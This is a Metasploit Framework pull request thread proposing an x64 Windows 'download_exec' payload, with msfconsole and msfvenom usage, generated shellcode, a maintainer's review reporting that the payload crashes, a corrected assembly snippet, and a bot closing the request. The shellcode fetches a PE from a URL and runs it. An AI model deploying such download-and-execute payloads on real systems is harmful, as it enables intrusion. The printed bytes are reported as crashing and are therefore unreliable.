Converted the download_exec windows payload to support x64 (Fixes Issue #12876)

[its-mr-monday]

Fixes #12876

The commit used the windows download_exec payload as a reference (x86), I figured that it would be useful to other operators to have a x64 variant of the payload

Verification

Its a simple drop in place payload, copy it over to the payloads/singles/windows/x64 directory and in my case run:

• reload_all

From here you should have the payload loaded, to generate a sample you may run:

• use payload/windows/x64/download_exec
• set EXE <executable name to drop on disk>
• set URL <endpoint of hosted PE file>
• (OPTIONAL) set EXITFUNC <seh/thread/process/none>
• generate

The module does not exploit anything, it simply drops a PE file on disk and calls CreateProcessA to spawn a process

Here is an example usage:

msf6 > use windows/x64/download_exec
msf6 payload(windows/x64/download_exec) > set EXE test.exe
EXE => test.exe
msf6 payload(windows/x64/download_exec) > set URL https://example.com/test.exe
URL => https://example.com/test.exe
msf6 payload(windows/x64/download_exec) > set EXITFUNC thread
EXITFUNC => thread
msf6 payload(windows/x64/download_exec) > generate
# windows/x64/download_exec - 526 bytes
# https://metasploit.com/
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# URL=https://example.com/test.exe, EXE=test.exe
buf =
"\xfc\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48" +
"\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" +
"\x20\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x4d\x31\xc9\x48" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +
"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41\x51\x8b\x42\x3c" +
"\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00" +
"\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +
"\xd0\x50\x44\x8b\x40\x20\x49\x01\xd0\x8b\x48\x18\xe3\x56" +
"\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48" +
"\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1" +
"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40" +
"\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" +
"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e" +
"\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52" +
"\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff" +
"\x5d\x48\x83\xec\x20\x48\xb9\x77\x69\x6e\x69\x6e\x65\x74" +
"\x00\x51\x54\x48\x89\xe1\x48\xc7\xc2\x4c\x77\x26\x07\xff" +
"\x55\xf8\x48\x83\xc4\x20\x48\x31\xc9\x48\x89\xca\x49\x89" +
"\xc8\x49\x89\xc9\x48\x8d\x4c\x24\x08\x48\xb8\x3a\x56\x79" +
"\xa7\x00\x00\x00\x00\xff\x55\xf8\x48\x8d\x54\x24\x20\x41" +
"\xb8\xbb\x01\x00\x00\x45\x31\xc9\x44\x89\x4c\x24\x28\x44" +
"\x89\x4c\x24\x30\x44\x89\x4c\x24\x38\x48\xc7\x44\x24\x40" +
"\x03\x00\x00\x00\x44\x89\x4c\x24\x48\x48\x89\x44\x24\x50" +
"\x48\xb8\x57\x89\x9f\xc6\x00\x00\x00\x00\xff\x55\xf8\x48" +
"\x31\xc9\x48\x31\xd2\x49\x89\xe0\x45\x31\xc9\x44\x89\x4c" +
"\x24\x08\x41\xb9\x00\x00\x40\x08\x48\xc7\xc0\xeb\x55\x2e" +
"\x3b\xff\x55\xf8\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d" +
"\x31\xc9\x48\xc7\xc0\x2d\x06\x18\x7b\xff\x55\xf8\x48\x31" +
"\xc9\x48\x89\xe2\x4d\x31\xc0\x41\xb9\x02\x00\x00\x00\x48" +
"\xc7\x44\x24\x08\x02\x00\x00\x00\x48\x31\xc0\x48\x89\x44" +
"\x24\x10\x48\x89\x44\x24\x18\x48\x89\x44\x24\x20\x48\xc7" +
"\xc0\xda\xf6\xda\x4f\xff\x55\xf8\x48\x89\xc1\x48\x89\xda" +
"\x49\x89\xf8\x4c\x8d\x4c\x24\x08\x48\xc7\xc0\x2d\x57\xae" +
"\x5b\xff\x55\xf8\x48\x89\xc1\x48\xc7\xc0\xc6\x96\x87\x52" +
"\xff\x55\xf8\x48\x8d\x4c\x24\x20\x48\x31\xd2\x49\x89\xd0" +
"\x49\x89\xd1\x48\xb8\x79\xcc\x3f\x86\x00\x00\x00\x00\xff" +
"\x55\xf8\x45\x31\xc9\x48\xc7\xc1\x00\x00\x00\x00\x48\xc7" +
"\xc2\xe0\x1d\x2a\x0a\xff\x55\xf8"

You may also use it with msfvenom to generate shellcode:

msfvenom -p windows/x64/download_exec -f <output_fmt> EXE=<executable> URL=<url> EXITFUNC=<exitfunc>

[dledda-r7]

Hello @its-mr-monday,
I have tried the payload but is crashing and I have addressed just couple of issues:

• the block api is stored in rbp but then [rbp-0x80] is used which cause a segfault.
• the register to store the block_api_hash for block-api x64 is r10d

I didn't look for other errors but even correcting the two mentioned issues on the whole payload code it's still crashing.

I am leaving here just a sample of correct api calling.

    start:
      pop rbp
    load_wininet:
      sub rsp, 32
      mov rcx, 0x0074656e696e6977 ; "wininet"
      push rcx
      push rsp
      mov rcx, rsp
      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
      call rbp

[github-actions]

Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it attic and closed it for now.

What does this generally mean? It could be one or more of several things:

• It doesn't look like there has been any activity on this pull request in a while
• We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
• Sometimes the implementation isn't quite right and a different approach is necessary.

We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!